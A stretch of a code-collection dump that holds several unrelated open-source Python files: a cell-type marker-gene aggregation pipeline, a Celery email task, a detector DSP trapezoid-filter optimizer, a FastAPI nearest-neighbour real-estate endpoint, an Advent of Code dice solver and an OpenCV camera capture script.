str\n The ';;'-concatenated DOIs extracted from the input references.\n titles - list[str]\n The ';;'-concatenated titles extracted from the input references.\n \"\"\"\n\n def fetch_doi_info(ref):\n doi = clean_doi(ref.doi)\n if doi:\n if doi not in doi_to_citation:\n title = get_title_and_citation_from_doi(doi)\n doi_to_citation[doi] = title\n else:\n title = doi_to_citation[doi]\n return doi, title\n\n with ThreadPoolExecutor() as executor:\n results = list(executor.map(fetch_doi_info, references))\n\n filtered_results = [result for result in results if result is not None]\n if not filtered_results:\n return \"\", \"\"\n\n refs, titles = zip(*filtered_results)\n return \";;\".join(refs), \";;\".join(titles)\n\n def get_processed_asctb_table_entries(self) -> dict[str, ParsedAsctbTableEntry]:\n \"\"\"\n Processes the ASCTB table entries and returns a dictionary mapping cell type ontology term IDs to\n ParsedAsctbTableEntry objects. The processing involves extracting relevant information from the ASCTB data\n such as tissue ID, gene symbols and names, DOIs and citations, and cell type ontology term IDs. 
It also\n involves cleaning and formatting the extracted data.\n\n Returns\n -------\n dict[str, ParsedAsctbTableEntry]\n A dictionary mapping cell type ontology term IDs to ParsedAsctbTableEntry objects.\n \"\"\"\n\n # DOI to citation mapping\n results = [delayed(self._process_asct_table__parallel)(tissue) for tissue in self.asctb_data]\n logger.info(f\"Getting processed ASCTB table entries for {len(self.asctb_data)} tissues...\")\n with ProgressBar():\n parsed_table_entries = sum(compute(*results, num_workers=CELLGUIDE_PIPELINE_NUM_CPUS), [])\n\n # Drop duplicate entries if they exist\n parsed_table_entries = pd.DataFrame(parsed_table_entries).drop_duplicates().to_dict(\"records\")\n\n logger.info(\"Fetching tissue names from UBERON ontology...\")\n tissues_in_parsed_table_entries = [i[\"tissue\"] for i in parsed_table_entries]\n tissues_by_id = {t: ontology_term_label(t) for t in tissues_in_parsed_table_entries}\n\n gene_infos = {}\n for entry in parsed_table_entries:\n entry_copy = entry.copy()\n ct = entry_copy[\"cell_type_ontology_term_id\"]\n del entry_copy[\"cell_type_ontology_term_id\"]\n\n celltype_markers_list = gene_infos.get(ct, [])\n entry_copy[\"tissue\"] = tissues_by_id.get(entry_copy[\"tissue\"], entry_copy[\"tissue\"])\n celltype_markers_list.append(entry_copy)\n gene_infos[ct] = celltype_markers_list\n\n logger.info(\"Aggregating gene biomarkers across tissues and publications across biomarkers and cell types...\")\n\n def aggregate_publications(publication):\n # Remove empty publications and get unique ones with order preserved\n publications = [i for i in publication.values if i != \"\"]\n unique_publications = list(dict.fromkeys(publications))\n return \";;\".join(unique_publications)\n\n def aggregate_gene_names(names, symbols):\n # If possible, pick a gene name that is not a gene symbol\n non_symbol_names = [name for name in names.values if name not in symbols]\n return next(iter(non_symbol_names), names.values[0])\n\n for cell_type in gene_infos:\n # Convert the list of gene info for the current cell type to a DataFrame\n gene_info_df = pd.DataFrame(gene_infos[cell_type])\n gene_symbols = gene_info_df[\"symbol\"].values\n\n # Group the DataFrame by tissue and symbol, and aggregate the names and publications\n aggregated_gene_info = (\n gene_info_df.groupby([\"tissue\", \"symbol\"])\n .agg(\n {\n \"name\": lambda names, symbols=gene_symbols: aggregate_gene_names(names, symbols),\n \"publication\": aggregate_publications,\n \"publication_titles\": aggregate_publications,\n }\n )\n .reset_index()\n .to_dict(orient=\"records\")\n )\n\n # Create a DataFrame from the aggregated gene info\n aggregated_gene_info_df = pd.DataFrame(aggregated_gene_info)\n\n # Aggregate the gene info across all tissues\n all_tissues_gene_info = (\n aggregated_gene_info_df.groupby(\"symbol\")\n .agg(\n {\n \"name\": lambda names, symbols=gene_symbols: aggregate_gene_names(names, symbols),\n \"publication\": aggregate_publications,\n \"publication_titles\": aggregate_publications,\n }\n )\n .reset_index()\n )\n\n # Add a column indicating these records are for all tissues\n all_tissues_gene_info[\"tissue\"] = \"All Tissues\"\n\n # Ensure the DataFrame has the same column order as the original\n all_tissues_gene_info = all_tissues_gene_info[aggregated_gene_info_df.columns]\n\n # Add the all-tissues gene info to the list of aggregated gene info\n aggregated_gene_info.extend(all_tissues_gene_info.to_dict(orient=\"records\"))\n\n # Update the gene info for the current cell type\n 
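# Each aggregated record is wrapped in ParsedAsctbTableEntry so downstream\n            # consumers receive typed entries rather than raw dicts.\n            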
gene_infos[cell_type] = [ParsedAsctbTableEntry(**entry) for entry in aggregated_gene_info]\n\n return gene_infos\n\n def _process_asct_table__parallel(self, tissue: str) -> list[dict[str, str]]:\n \"\"\"\n Processes the ASCTB table entries for a given tissue in parallel and returns a list of dictionaries.\n Each dictionary is an entry containing a tissue, gene symbol, gene name, publication,\n publication title, and cell type ontology term ID. The processing involves extracting\n relevant information from the ASCTB data such as tissue ID, gene symbols and names, DOIs and citations,\n and cell type ontology term IDs. It also involves cleaning and formatting the extracted data.\n\n Arguments\n ---------\n tissue - str\n The tissue for which the ASCTB table entries are to be processed.\n\n Returns\n -------\n list[dict[str, str]]\n A list of dictionaries, each containing information about a unique combination of tissue, gene symbol,\n gene name, publication, publication title, and cell type ontology term ID.\n \"\"\"\n\n doi_to_citation = {}\n\n data = self.asctb_data[tissue][\"data\"]\n\n parsed_table_entries = []\n for row in data:\n cell_types = [celltype[\"id\"] for celltype in row[\"cell_types\"] if celltype[\"id\"].startswith(\"CL:\")]\n if not cell_types or not row[\"biomarkers_gene\"]:\n continue\n\n tissue_id = self._get_tissue_id([AnatomicalStructure(**entry) for entry in row[\"anatomical_structures\"]])\n gene_symbols, gene_names = self._get_gene_info([GeneBiomarker(**entry) for entry in row[\"biomarkers_gene\"]])\n refs, titles = self._get_references([Reference(**entry) for entry in row[\"references\"]], doi_to_citation)\n\n for cell_type in cell_types:\n for index in range(len(gene_symbols)):\n symbol = gene_symbols[index]\n name = gene_names[index]\n\n entry = {\n \"tissue\": tissue_id,\n \"symbol\": symbol,\n \"name\": name,\n \"publication\": refs,\n \"publication_titles\": titles,\n \"cell_type_ontology_term_id\": cell_type,\n }\n parsed_table_entries.append(entry)\n return parsed_table_entries\n","repo_name":"chanzuckerberg/single-cell-data-portal","sub_path":"backend/cellguide/pipeline/canonical_marker_genes/canonical_markers.py","file_name":"canonical_markers.py","file_ext":"py","file_size_in_byte":12616,"program_lang":"python","lang":"en","doc_type":"code","stars":50,"dataset":"github-code","pt":"35"} +{"seq_id":"30132708184","text":"from __future__ import absolute_import, unicode_literals\n\nfrom celery import shared_task\nfrom django.conf import settings\nfrom django.core.mail import send_mail\n\n\n@shared_task\ndef send_email(email=None):\n if email:\n send_mail(\n 'Thanks for your order!',\n 'We will contact you as soon as possible.',\n settings.DEFAULT_FROM_EMAIL,\n [email],\n fail_silently=False,\n )\n","repo_name":"Dmitry-Kiselev/store","sub_path":"order/tasks.py","file_name":"tasks.py","file_ext":"py","file_size_in_byte":436,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"24372600540","text":"#!/usr/bin/env python3\nimport os\nimport re\nimport time\nimport json\nimport argparse\nimport pandas as pd\nimport numpy as np\nfrom pprint import pprint\nfrom datetime import datetime\nimport itertools\nfrom collections import OrderedDict\nfrom scipy.optimize import curve_fit\n\nimport tinydb as db\nfrom tinydb.storages import MemoryStorage\n\nimport matplotlib\nif os.environ.get('HOSTNAME'): # cenpa-rocks\n matplotlib.use('Agg')\nimport matplotlib.pyplot as plt\nplt.style.use('../clint.mpl')\nfrom 
matplotlib.colors import LogNorm\n\nimport warnings\nwith warnings.catch_warnings():\n warnings.simplefilter(\"ignore\")\n from tqdm import tqdm\n tqdm.pandas() # suppress annoying FutureWarning\n\nfrom pygama import DataGroup\nfrom pygama.dsp.units import *\nfrom pygama.io.raw_to_dsp import build_processing_chain\nfrom pygama.dsp.ProcessingChain import ProcessingChain\nimport pygama.io.lh5 as lh5\nimport pygama.analysis.histograms as pgh\nimport pygama.analysis.peak_fitting as pgf\n\n\ndef main():\n doc=\"\"\"\n === optimizer.py ====================================================\n\n dsp optimization app, works with DataGroup\n\n === C. Wiseman (UW) =============================================\n \"\"\"\n rthf = argparse.RawTextHelpFormatter\n par = argparse.ArgumentParser(description=doc, formatter_class=rthf)\n arg, st, sf = par.add_argument, 'store_true', 'store_false'\n \n # primary operations\n arg('-q', '--query', nargs=1, type=str,\n help=\"select group to analyze: -q 'cycle==1' \")\n arg('-e', '--energy', action=st, help='optimize energy trapezoid')\n arg('-d', '--dcr', action=st, help='optimize DCR parameter')\n\n args = par.parse_args()\n \n # -- setup -- \n \n # load main DataGroup, select files to analyze\n dg = DataGroup('cage.json', load=True)\n if args.query:\n que = args.query[0]\n dg.fileDB.query(que, inplace=True)\n else:\n dg.fileDB = dg.fileDB[-1:]\n \n view_cols = ['run','cycle','daq_file','runtype','startTime','threshold']\n print(dg.fileDB[view_cols].to_string())\n # print(f'Found {len(dg.fileDB)} files.')\n \n # -- run routines -- \n \n # TODO : we could split this code into \"spectrum\" (peak width) optimizations, \n # and \"waveform\" optimizations, where the FOM is a waveform, not a peak.\n # so like optimize_spec.py and optimize_wfs.py\n \n optimize_trap(dg)\n show_trap_results()\n \n # optimize_dcr(dg) \n # show_dcr_results(dg)\n # check_wfs(dg)\n \n \ndef optimize_trap(dg):\n \"\"\"\n Generate a file with grid points to search, and events from the target peak. \n Then run DSP a bunch of times on the small table, and fit the peak w/ the\n peakshape function. \n NOTE: run table-to-table DSP (no file I/O)\n \"\"\"\n f_peak = './temp_peak.lh5' # lh5\n f_results = './temp_results.h5' # pandas\n grp_data, grp_grid = '/optimize_data', '/optimize_grid'\n \n # epar, elo, ehi, epb = 'energy', 0, 1e7, 10000 # full range\n epar, elo, ehi, epb = 'energy', 3.88e6, 3.92e6, 500 # K40 peak\n \n show_movie = True\n write_output = True\n n_rows = None # default None\n \n with open('opt_trap.json') as f:\n dsp_config = json.load(f, object_pairs_hook=OrderedDict)\n \n # files to consider. 
fixme: right now only works with one file\n sto = lh5.Store()\n lh5_dir = os.path.expandvars(dg.config['lh5_dir'])\n raw_list = lh5_dir + dg.fileDB['raw_path'] + '/' + dg.fileDB['raw_file']\n f_raw = raw_list.values[0] \n tb_raw = 'ORSIS3302DecoderForEnergy/raw/'\n\n # quick check of the energy range\n # ene_raw = sto.read_object(tb_raw+'/'+epar, f_raw).nda\n # hist, bins, var = pgh.get_hist(ene_raw, range=(elo, ehi), dx=epb)\n # plt.plot(bins[1:], hist, ds='steps')\n # plt.show()\n # exit()\n \n # set grid parameters\n # TODO: jason's suggestions, knowing the expected shape of the noise curve\n # e_rises = np.linspace(-1, 0, sqrt(sqrt(3))\n # e_rises # make another list which is 10^pwr of this list\n # np.linspace(log_tau_min, log_tau_max) # try this too\n e_rises = np.arange(1, 12, 1)\n e_flats = np.arange(1, 6, 1)\n # rc_consts = np.arange(54, 154, 10) # changing this here messes up DCR\n \n # -- create the grid search file the first time -- \n # NOTE: this makes a linear grid, and is editable by the arrays above.\n # jason also proposed a more active gradient-descent style search\n # like with Brent's method. (https://en.wikipedia.org/wiki/Brent%27s_method)\n \n if True:\n # if not os.path.exists(f_peak):\n print('Recreating grid search file')\n \n # create the grid file\n # NOTE: save it as an lh5 Table just as an example of writing/reading one\n lists = [e_rises, e_flats]#, rc_consts]\n prod = list(itertools.product(*lists)) # clint <3 stackoverflow\n df_grid = pd.DataFrame(prod, columns=['rise', 'flat'])#,'rc']) \n lh5_grid = {}\n for i, dfcol in df_grid.iteritems():\n lh5_grid[dfcol.name] = lh5.Array(dfcol.values)\n tb_grid = lh5.Table(col_dict=lh5_grid)\n sto.write_object(tb_grid, grp_grid, f_peak)\n \n # filter events by onboard energy\n ene_raw = sto.read_object(tb_raw+'/'+epar, f_raw).nda\n # hist, bins, var = pgh.get_hist(ene_raw, range=(elo, ehi), dx=epb)\n # plt.plot(bins[1:], hist, ds='steps')\n # plt.show()\n if n_rows is not None:\n ene_raw = ene_raw[:n_rows]\n idx = np.where((ene_raw > elo) & (ene_raw < ehi))\n\n # create a filtered table with correct waveform and attrs\n # TODO: move this into a function in lh5.py which takes idx as an input\n tb_data, wf_tb_data = lh5.Table(), lh5.Table()\n\n # read non-wf cols (lh5 Arrays)\n data_raw = sto.read_object(tb_raw, f_raw, n_rows=n_rows)\n for col in data_raw.keys():\n if col=='waveform': continue\n newcol = lh5.Array(data_raw[col].nda[idx], attrs=data_raw[col].attrs)\n tb_data.add_field(col, newcol)\n \n # handle waveform column (lh5 Table)\n data_wfs = sto.read_object(tb_raw+'/waveform', f_raw, n_rows=n_rows)\n for col in data_wfs.keys():\n attrs = data_wfs[col].attrs\n if isinstance(data_wfs[col], lh5.ArrayOfEqualSizedArrays):\n # idk why i can't put the filtered array into the constructor\n aoesa = lh5.ArrayOfEqualSizedArrays(attrs=attrs, dims=[1,1])\n aoesa.nda = data_wfs[col].nda[idx]\n newcol = aoesa\n else:\n newcol = lh5.Array(data_wfs[col].nda[idx], attrs=attrs)\n wf_tb_data.add_field(col, newcol)\n tb_data.add_field('waveform', wf_tb_data)\n tb_data.attrs = data_raw.attrs\n sto.write_object(tb_data, grp_data, f_peak)\n\n else:\n print('Loading peak file. 
groups:', sto.ls(f_peak))\n tb_grid = sto.read_object(grp_grid, f_peak)\n tb_data = sto.read_object(grp_data, f_peak) # filtered file\n # tb_data = sto.read_object(tb_raw, f_raw) # orig file\n df_grid = tb_grid.get_dataframe()\n \n # check shape of input table\n print('input table attributes:')\n for key in tb_data.keys():\n obj = tb_data[key]\n if isinstance(obj, lh5.Table):\n for key2 in obj.keys():\n obj2 = obj[key2]\n print(' ', key, key2, obj2.nda.shape, obj2.attrs)\n else:\n print(' ', key, obj.nda.shape, obj.attrs)\n\n # clear new colums if they exist\n new_cols = ['e_fit', 'fwhm_fit', 'rchisq', 'xF_err', 'fwhm_ovr_mean']\n for col in new_cols:\n if col in df_grid.columns:\n df_grid.drop(col, axis=1, inplace=True)\n\n t_start = time.time()\n def run_dsp(dfrow):\n \"\"\"\n run dsp on the test file, editing the processor list\n alternate idea: generate a long list of processors with different names\n \"\"\"\n # adjust dsp config dictionary\n rise, flat = dfrow\n # dsp_config['processors']['wf_pz']['defaults']['db.pz.tau'] = f'{tau}*us'\n dsp_config['processors']['wf_trap']['args'][1] = f'{rise}*us'\n dsp_config['processors']['wf_trap']['args'][2] = f'{flat}*us'\n # pprint(dsp_config)\n \n # run dsp\n pc, tb_out = build_processing_chain(tb_data, dsp_config, verbosity=0)\n pc.execute()\n \n # analyze peak\n e_peak = 1460.\n etype = 'trapEmax'\n elo, ehi, epb = 4000, 4500, 3 # the peak moves around a bunch\n energy = tb_out[etype].nda\n \n # get histogram\n hE, bins, vE = pgh.get_hist(energy, range=(elo, ehi), dx=epb)\n xE = bins[1:]\n \n # should I center the max at 1460?\n\n # simple numerical width\n i_max = np.argmax(hE)\n h_max = hE[i_max]\n upr_half = xE[(xE > xE[i_max]) & (hE <= h_max/2)][0]\n bot_half = xE[(xE < xE[i_max]) & (hE >= h_max/2)][0]\n fwhm = upr_half - bot_half\n sig = fwhm / 2.355\n \n # fit to gaussian: amp, mu, sig, bkg\n fit_func = pgf.gauss_bkg\n amp = h_max * fwhm\n bg0 = np.mean(hE[:20])\n x0 = [amp, xE[i_max], sig, bg0]\n xF, xF_cov = pgf.fit_hist(fit_func, hE, bins, var=vE, guess=x0)\n\n # collect results\n e_fit = xF[0]\n xF_err = np.sqrt(np.diag(xF_cov))\n e_err = xF\n fwhm_fit = xF[1] * 2.355 * 1460. / e_fit\n \n fwhm_err = xF_err[2] * 2.355 * 1460. / e_fit\n \n chisq = []\n for i, h in enumerate(hE):\n model = fit_func(xE[i], *xF)\n diff = (model - h)**2 / model\n chisq.append(abs(diff))\n rchisq = sum(np.array(chisq) / len(hE))\n fwhm_ovr_mean = fwhm_fit / e_fit\n\n if show_movie:\n \n plt.plot(xE, hE, ds='steps', c='b', lw=2, label=f'{etype} {rise}--{flat}')\n\n # peak shape\n plt.plot(xE, fit_func(xE, *x0), '-', c='orange', alpha=0.5,\n label='init. 
guess')\n plt.plot(xE, fit_func(xE, *xF), '-r', alpha=0.8, label='peakshape fit')\n plt.plot(np.nan, np.nan, '-w', label=f'mu={e_fit:.1f}, fwhm={fwhm_fit:.2f}')\n\n plt.xlabel(etype, ha='right', x=1)\n plt.ylabel('Counts', ha='right', y=1)\n plt.legend(loc=2)\n\n # show a little movie\n plt.show(block=False)\n plt.pause(0.01)\n plt.cla()\n\n # return results\n return pd.Series({'e_fit':e_fit, 'fwhm_fit':fwhm_fit, 'rchisq':rchisq,\n 'fwhm_err':xF_err[0], 'fwhm_ovr_mean': fwhm_ovr_mean})\n \n # df_grid=df_grid[:10]\n df_tmp = df_grid.progress_apply(run_dsp, axis=1)\n df_grid[new_cols] = df_tmp\n # print(df_grid)\n \n if show_movie:\n plt.close()\n \n print('elapsed:', time.time() - t_start)\n if write_output:\n df_grid.to_hdf(f_results, key=grp_grid)\n print(f\"Wrote output file: {f_results}\")\n\n\ndef show_trap_results():\n \"\"\"\n plot of ramp/flat time vs target peak FWHM\n \"\"\"\n df_grid = pd.read_hdf('./temp_results.h5', '/optimize_grid')\n print(df_grid)\n \n print('Minimum fwhm:')\n print(df_grid[df_grid.fwhm_ovr_mean==df_grid.fwhm_ovr_mean.min()])\n \n plt.plot(df_grid.e_fit, df_grid.fwhm_ovr_mean, '.b')\n plt.show()\n \n \ndef optimize_dcr(dg):\n \"\"\"\n I don't have an a priori figure of merit for the DCR parameter, until I can\n verify that we're seeing alphas. So this function should just run processing\n on a CAGE run with known alpha events, and show you the 2d DCR vs. energy.\n \n Once we know we can reliably measure the alpha distribution somehow, then\n perhaps we can try a grid search optimization like the one done in \n optimize_trap.\n \"\"\"\n # files to consider. fixme: right now only works with one file\n sto = lh5.Store()\n lh5_dir = os.path.expandvars(dg.config['lh5_dir'])\n raw_list = lh5_dir + dg.fileDB['raw_path'] + '/' + dg.fileDB['raw_file']\n f_raw = raw_list.values[0] \n \n tb_raw = 'ORSIS3302DecoderForEnergy/raw/'\n tb_data = sto.read_object(tb_raw, f_raw)\n \n cycle = dg.fileDB['cycle'].values[0]\n f_results = f'./temp_{cycle}.h5'\n \n write_output = True\n \n # adjust dsp config \n with open('opt_dcr.json') as f:\n dsp_config = json.load(f, object_pairs_hook=OrderedDict)\n # pprint(dsp_config)\n # exit()\n \n # set dcr parameters\n # rise, flat, dcr_tstart = 200, 1000, 'tp_0+1.5*us' # default\n # dcr_rise, dcr_flat, dcr_tstart = 100, 3000, 'tp_0+3*us' # best so far?\n dcr_rise, dcr_flat, dcr_tstart = 100, 2500, 'tp_0+1*us'\n dsp_config['processors']['dcr_raw']['args'][1] = dcr_rise\n dsp_config['processors']['dcr_raw']['args'][2] = dcr_flat\n dsp_config['processors']['dcr_raw']['args'][3] = dcr_tstart\n \n # set trap energy parameters\n # ene_rise, ene_flat = \"2*us\", \"1*us\" # best? from optimize_trap\n ene_rise, ene_flat = \"10*us\", \"5*us\"\n dsp_config['processors']['wf_trap']['args'][1] = ene_rise\n dsp_config['processors']['wf_trap']['args'][2] = ene_flat\n \n # adjust pole-zero constant\n dsp_config['processors']['wf_pz']['defaults']['db.pz.tau'] = '64.4*us'\n # dsp_config['processors']['wf_pz']['defaults']['db.pz.tau'] = '50*us'\n # dsp_config['processors']['wf_pz']['defaults']['db.pz.tau'] = '100*us'\n \n # run dsp\n print('Running DSP ...')\n t_start = time.time()\n pc, tb_out = build_processing_chain(tb_data, dsp_config, verbosity=1)\n pc.execute()\n t_elap = (time.time() - t_start)/60\n print(f'Done. 
Elapsed: {t_elap:.2f} min')\n \n df_out = tb_out.get_dataframe()\n \n if write_output:\n df_out.to_hdf(f_results, key='opt_dcr')\n print('Wrote output file:', f_results)\n \n \ndef show_dcr_results(dg):\n \"\"\"\n plot of dcr vs energy for a single setting\n \"\"\"\n cycle = dg.fileDB['cycle'].values[0]\n df_dsp = pd.read_hdf(f'./temp_{cycle}.h5', 'opt_dcr')\n # print(df_dsp.describe()) \n\n # compare DCR and A/E distributions\n fig, (p0, p1) = plt.subplots(2, 1, figsize=(8, 8))\n \n elo, ehi, epb = 0, 25000, 100\n \n # aoe distribution\n # ylo, yhi, ypb = -1, 2, 0.1\n # ylo, yhi, ypb = -0.1, 0.3, 0.005\n ylo, yhi, ypb = 0.05, 0.08, 0.0005\n nbx = int((ehi-elo)/epb)\n nby = int((yhi-ylo)/ypb)\n h = p0.hist2d(df_dsp['trapEmax'], df_dsp['aoe'], bins=[nbx,nby],\n range=[[elo, ehi], [ylo, yhi]], cmap='jet',\n norm=LogNorm())\n # p0.set_xlabel('Energy (uncal)', ha='right', x=1)\n p0.set_ylabel('A/E', ha='right', y=1)\n\n # dcr distribution\n # ylo, yhi, ypb = -20, 20, 1 # dcr_raw\n # ylo, yhi, ypb = -5, 2.5, 0.1 # dcr = dcr_raw / trapEmax\n # ylo, yhi, ypb = -3, 2, 0.1\n ylo, yhi, ypb = 0.9, 1.08, 0.001\n ylo, yhi, ypb = 1.034, 1.0425, 0.00005 # best for 64.4 us pz\n # ylo, yhi, ypb = 1.05, 1.056, 0.00005 # best for 50 us pz\n # ylo, yhi, ypb = 1.016, 1.022, 0.00005 # best for 100 us pz\n nbx = int((ehi-elo)/epb)\n nby = int((yhi-ylo)/ypb)\n h = p1.hist2d(df_dsp['trapEmax'], df_dsp['dcr'], bins=[nbx,nby],\n range=[[elo, ehi], [ylo, yhi]], cmap='jet',\n norm=LogNorm())\n p1.set_xlabel('Energy (uncal)', ha='right', x=1)\n p1.set_ylabel('DCR', ha='right', y=1)\n \n # plt.show()\n plt.savefig(f'./plots/dcr_cyc{cycle}.png', dpi=300)\n plt.cla()\n \n \ndef check_wfs(dg):\n \"\"\"\n somebody inevitably asks you, 'have you looked at the waveforms?'\n in this function, compare alpha wfs to gamma wfs\n \n use the temp_results file to pick indexes, and grab the corresponding\n wfs. LH5 doesn't let us only load particular indexes (yet), so we\n have to load all the waveforms in the file every time. 
butts.\n \"\"\"\n # load dsp results\n cycle = dg.fileDB['cycle'].values[0]\n df_dsp = pd.read_hdf(f'./temp_{cycle}.h5', 'opt_dcr')\n \n # load waveforms\n sto = lh5.Store()\n lh5_dir = os.path.expandvars(dg.config['lh5_dir'])\n raw_list = lh5_dir + dg.fileDB['raw_path'] + '/' + dg.fileDB['raw_file']\n f_raw = raw_list.values[0] \n tb_wfs = sto.read_object('ORSIS3302DecoderForEnergy/raw/waveform', f_raw)\n \n # energy cut\n et = 'trapEmax'\n # elo, ehi = 8000, 16000\n # elo, ehi = 8000, 10000\n elo, ehi = 12000, 13000\n \n # dcr cut\n # alp_lo, alp_hi = -0.5, 0.5\n # gam_lo, gam_hi = 0.8, 1.2\n \n # aoe cut\n alp_lo, alp_hi = 0.064, 0.068\n gam_lo, gam_hi = 0.05, 0.06\n \n # selection\n idx_alp = df_dsp[et].loc[(df_dsp[et] > elo) & (df_dsp[et] < ehi) & \n (df_dsp.aoe > alp_lo) & (df_dsp.aoe < alp_hi)].index\n \n idx_gam = df_dsp[et].loc[(df_dsp[et] > elo) & (df_dsp[et] < ehi) & \n (df_dsp.aoe > gam_lo) & (df_dsp.aoe < gam_hi)].index\n \n wfs_alp = tb_wfs['values'].nda[idx_alp]\n wfs_gam = tb_wfs['values'].nda[idx_gam]\n \n print(f'found {wfs_alp.shape[0]} alpha candidates')\n print(f'found {wfs_gam.shape[0]} gamma candidates')\n \n # plot \n # fig, (p0, p1) = plt.subplots(2, 1, figsize=(8, 8))\n \n ts = np.arange(0, wfs_gam.shape[1], 1)\n\n n_gam = 10 if wfs_gam.shape[0] > 10 else wfs_gam.shape[0]\n for iwf in range(n_gam):\n max = np.amax(wfs_gam[iwf,:])\n # max = df_dsp[et].values[iwf]\n plt.plot(ts[:-1], wfs_gam[iwf,:-1]/max, '-b', lw=1, alpha=0.5)\n \n n_alp = 10 if wfs_alp.shape[0] > 10 else wfs_alp.shape[0]\n for iwf in range(n_alp):\n max = np.amax(wfs_alp[iwf,:])\n # max = df_dsp[et].values[iwf]\n plt.plot(ts[:-1], wfs_alp[iwf,:-1]/max, '-r', lw=1, alpha=0.5)\n\n # plt.xlim(1\n\n plt.xlabel('time (clock ticks)', ha='right', x=1)\n plt.ylabel('ADC', ha='right', y=1)\n plt.show()\n\n\nif __name__==\"__main__\":\n main()","repo_name":"CJNave613/CAGE","sub_path":"analysis/optimizer.py","file_name":"optimizer.py","file_ext":"py","file_size_in_byte":17842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"35"} +{"seq_id":"13333370437","text":"# fastapi-example/app.py\n# -*- coding: utf-8 -*-\n\n\nfrom typing import Optional\nfrom fastapi import FastAPI\nfrom sklearn.metrics.pairwise import haversine_distances\nfrom sklearn.neighbors import KNeighborsTransformer\nfrom math import radians\nfrom scipy.sparse import coo_matrix, hstack\nfrom scipy.sparse import save_npz, load_npz\nimport pandas as pd\nimport numpy as np\nfrom pickle import dump,load\n\ndataset = pd.read_csv('comparable_estates.txt', sep='|')\n#dataset = dataset[['latitude', 'longitude', 'area', 'bathrooms', 'garages', 'rooms', 'type']]\n#dataset['latitude'] = dataset['latitude'].apply(radians)\n#dataset['longitude'] = dataset['longitude'].apply(radians)\n#radianes = np.array(dataset[['latitude', 'longitude']])\n#transformer = KNeighborsTransformer(n_neighbors=20, mode='connectivity', metric='haversine')\n#transf_vecinos2 = transformer.fit(radianes)\n#matriz_vecinos_cercanos = transf_vecinos2.transform(radianes)\n#dump(transf_vecinos2, open('transf_vecinos.pkl', 'wb'))\n\ntransf_vecinos = load(open('transf_vecinos.pkl', 'rb'))\nst_fit = load(open('st_fit.pkl', 'rb'))\nmodelo_ajust_ = load(open('modelo_ajust.pkl', 'rb'))\nmodel_ = load(open('neighs.pkl', 'rb'))\n\napp = FastAPI()\n\n\n@app.get(\"/400\")\ndef vecinos_cercanos(latitud: float, longitud: float,\n area: float, bathrooms: float,\n garages:float, rooms:float, tipo:float):\n latitude = radians(latitud)\n longitude = radians(longitud)\n 
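# The pickled neighbor models were fit on coordinates in radians with the\n    # haversine metric, so the query point is converted to radians first.\n    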
unic_dist = np.array([[latitude, longitude]])\n vecinos_distancia = modelo_ajust_.transform(unic_dist) * 2\n features = pd.DataFrame([{'area': area, 'bathrooms': bathrooms,\n 'garages': garages, 'rooms': rooms,\n 'type': tipo}])\n\n matriz_variables = hstack([vecinos_distancia, coo_matrix(features)]).tocsr()\n matriz_variables = st_fit.transform(matriz_variables)\n vecinos = model_.kneighbors(matriz_variables)\n vecinos = pd.DataFrame(np.concatenate(vecinos).T)\n M = vecinos[1]\n resultado = dataset.loc[M, ['latitude', 'longitude', 'area', 'bathrooms', 'garages', 'rooms', 'type']]\n js = resultado.to_json(orient='columns')\n return js\n\n","repo_name":"marco-ramirezpp/modelo_comparables","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"27337763328","text":"# Written by Cameron Haddock\n# Written as a solution for Advent of Code 2021\n\n# https://adventofcode.com/2021/day/21\n\nfrom functools import lru_cache\nfrom collections import Counter\nfrom itertools import product\n\nclass Player:\n def __init__(self,position:int,score:int=0):\n self.position = position\n self.score = score\n\n def step(self,rolls:int):\n self.position += rolls\n self.position %= 10\n if self.position == 0:\n self.position = 10\n self.score += self.position\n return self\n\n def copy(self) -> 'Player':\n return Player(self.position,self.score)\n\n def __repr__(self) -> str:\n return f'Player({self.position},{self.score})'\n\n def __eq__(self,other:'Player') -> bool:\n return self.position == other.position and self.score == other.score\n\n def __hash__(self):\n return hash((self.position,self.score))\n\nTARGET_SCORE = 21\nDIRAC_ROLLS = Counter(d1+d2+d3 for d1,d2,d3 in product([1,2,3],repeat=3))\n\n@lru_cache(maxsize=None)\ndef play_dice(p1:Player,p2:Player,turn:bool) -> tuple[int,int]:\n if p1.score >= TARGET_SCORE:\n return 1,0\n if p2.score >= TARGET_SCORE:\n return 0,1\n\n p1_wins,p2_wins = 0,0\n for roll,freq in DIRAC_ROLLS.items():\n if turn:\n scores = play_dice(p1.copy().step(roll),p2,False)\n else:\n scores = play_dice(p1,p2.copy().step(roll),True)\n p1_wins += scores[0] * freq\n p2_wins += scores[1] * freq\n\n return p1_wins,p2_wins\n\n\nwith open('2021/21/input.txt') as f:\n p1_line,p2_line = f.read().splitlines()\np1 = Player(int(p1_line.split()[-1]))\np2 = Player(int(p2_line.split()[-1]))\n\nprint(play_dice(p1,p2,True))","repo_name":"TheBiggerFish/AdventOfCode","sub_path":"2021/21/dec21_part2.py","file_name":"dec21_part2.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"73776603941","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu May 11 12:43:16 2017\n\n@author: i13yamamoto2y\n\"\"\"\n\nimport cv2\n\ncap2 = cv2.VideoCapture(1);\ni = 0;\nwhile(True):\n ret, frame2 = cap2.read();\n \n cv2.imshow(\"image2\", frame2);\n \n key = cv2.waitKey(1)\n if key == ord(\"a\"):\n break;\n if key == ord(\"s\"):\n cv2.imwrite(\"C:/Users/i13yamamoto2y/Documents/tmp/camera2/{0}.jpg\".format(i), frame2);\n i += 1;\n\ncap2.release();\ncv2.destroyAllWindows();\n","repo_name":"YamamotoYuya/calibrate","sub_path":"capture1.py","file_name":"capture1.py","file_ext":"py","file_size_in_byte":469,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"74705062820","text":"import json\nimport os\nimport re\nimport 
